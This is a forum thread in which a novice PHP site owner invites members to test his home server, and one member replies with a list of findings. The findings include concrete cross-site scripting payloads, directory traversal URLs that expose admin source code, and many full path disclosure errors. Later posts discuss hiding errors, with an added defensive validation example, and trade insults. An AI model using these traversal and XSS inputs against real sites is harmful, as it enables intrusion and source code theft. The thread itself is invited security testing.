Some stuff to test for exploits/etc


speaker219

seems ok. I security tested some of the apps (though not super thoroughly) and they're good. Only why do you have a full directory listing script up there?!?!?!?!? not that I could find anything sensitive, but still...


seems ok. I security tested some of the apps (though not super thoroughly) and they're good. Only why do you have a full directory listing script up there?!?!?!?!? not that I could find anything sensitive, but still...

Gah, I have nothing to hide ;) and there's some stuff for people to just look around through, nothing dangerous


http://speaker219.ath.cx:8080/RSS-Reader.php?q=noone

 

Warning: DOMDocument::load() [function.DOMDocument-load]: Empty string supplied as input in D:\xampplite\htdocs\RSS-Reader.php on line 19

Fatal error: Call to a member function getElementsByTagName() on a non-object in D:\xampplite\htdocs\RSS-Reader.php on line 23

 

:)


Admin Access:

You can view and edit the site's source code through the Directory Traversal in the notes script.

 

Array:

http://speaker219.ath.cx:8080/blog/index.php?waka[]

 

Array:

http://speaker219.ath.cx:8080/blog/test.node?text[]

 

Array:

http://speaker219.ath.cx:8080/Chat/history.php?log[]

 

Cross Site Scripting:

http://speaker219.ath.cx:8080/blog/index.php?waka=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://speaker219.ath.cx:8080/blog/test.node?text=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a note that contains </textarea>code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://speaker219.ath.cx:8080/URL-Encoder/test.php if the URL field contains code.

 

Directory Traversal:

http://speaker219.ath.cx:8080/Chat/history.php?log=1/../../../vulnerable

 

Directory Traversal:

http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/preferences.php

Fatal error: Class 'FileStorage' not found in D:\xampplite\htdocs\Chat\preferences.php on line 6

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/ajax.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/announcement.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/calendar.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/cron.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/editpost.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/external.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/faq.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/forumdisplay.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Pics/lolcats/?id[]

Fatal error: Unsupported operand types in D:\xampplite\htdocs\Pics\lolcats\index.php on line 11

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/scripts/test.php?txt[]

Warning: preg_match_all() expects parameter 2 to be string, array given in D:\xampplite\htdocs\scripts\test.php on line 8

Number of upper case letters:

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/RSS-Reader.php?q=a

Warning: DOMDocument::load() [function.DOMDocument-load]: Empty string supplied as input in D:\xampplite\htdocs\RSS-Reader.php on line 19

 

Fatal error: Call to a member function getElementsByTagName() on a non-object in D:\xampplite\htdocs\RSS-Reader.php on line 23

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/history.php?log=2'

Warning: fopen(logs/log.2\'.txt) [function.fopen]: failed to open stream: No such file or directory in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 12

 

Warning: fseek(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 53

 

Warning: file_get_contents(logs/log.2\'.txt) [function.file-get-contents]: failed to open stream: No such file or directory in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 55

 

Warning: ftruncate(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 60

 

Warning: fwrite(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 61

 

Warning: flock() expects parameter 1 to be resource, boolean given in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 44

 

Warning: fclose(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 25

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/cp/bans.php

Fatal error: Call to undefined function ys() in D:\xampplite\htdocs\Chat\cp\bans.php on line 2

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/notes/paste-edit.php

Warning: fread(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\notes\paste-edit.php on line 12

 

PHP Source Code Disclosure:

http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php


Alright, I fixed a lot of those. I'm still pretty new to PHP so I thank you guys for showing me I need to make stuff more secure :)

Anyways, I was wondering if it is possible to totally disable full path disclosure? Maybe a setting in php.ini? thanks.


yeah start making your code better...

Instead of giving a snob response, maybe you could answer my question. I was wondering if there was a setting in php.ini that could fix that problem. I'm not saying my code is so great, but there's no reason for you to be a snob when I ask a simple question. And it's not like I'm the only one -- ever heard of vBulletin? Yeah, there's even bugs in things like that! That's probably a shocker for you. Thanks for all of your wonderful, kind help.

Yeah, also, some of the things there with bugs were third party scripts. For example, the forum (vBulletin) and the chat script (yShout): I did not create either of those.


error_reporting(0);

 

 

iHack.

 

Turning off error reporting will also disable error logging. Unless you're retarded, you want to keep logging and reporting (possibly emailing) errors, you just don't want to display them.

 

So, at the risk of being childish and plain unfriendly: please refrain from posting unless you either have a clue or are inquiring.
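
Added example (not part of any post in this thread, and not code from yShout or the site): one way to keep errors logged while hiding them from visitors, combined with validation of the `log` parameter that rejects the array, quote and `../` inputs reported earlier in the thread. The function name `resolve_log_path()` and the demo directory are assumptions; the `log.<id>.txt` naming follows the warnings quoted above.

```php
<?php
// Added example. Assumed names: resolve_log_path() and the demo directory.

// Report and log every error, but never render it into the page.
// php.ini equivalents: display_errors = Off, log_errors = On.
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');
// error_log keeps the server default here; point it at a file outside the web root.

/** Map the untrusted ?log= value to a file inside $baseDir, or return null. */
function resolve_log_path($raw, string $baseDir): ?string
{
    // ?log[] arrives as an array; feeding it to string functions produces
    // the "array given" warnings that leaked the install path.
    if (!is_string($raw)) {
        return null;
    }
    // Allow-list: a log id is a short run of digits, so "2'" and
    // "1/../../../vulnerable" never reach the filesystem.
    if (preg_match('/\A[0-9]{1,6}\z/', $raw) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . 'log.' . $raw . '.txt');
    if ($path === false) {
        return null;
    }
    // Containment check: the resolved file must still sit under the log directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: one log file in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'logs_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'log.1.txt', "constructed sample\n");
foreach (['1', "2'", '1/../../../vulnerable', ['x']] as $input) {
    $result = resolve_log_path($input, $dir);
    echo json_encode($input), ' => ', $result === null ? 'rejected' : 'accepted', "\n";
}
```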


yeah start making your code better...

Instead of giving a snob response, maybe you could answer my question. I was wondering if there was a setting in php.ini that could fix that problem. I'm not saying my code is so great, but there's no reason for you to be a snob when I ask a simple question. And it's not like I'm the only one -- ever heard of vBulletin? Yeah, there's even bugs in things like that! That's probably a shocker for you. Thanks for all of your wonderful, kind help.

Yeah, also, some of the things there with bugs were third party scripts. For example, the forum (vBulletin) and the chat script (yShout): I did not create either of those.

Nice comeback !! lol


If you don't like the company, feel free to leave and never come back any time.

 

I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly.

 

Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less.

 

It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar.

 

 
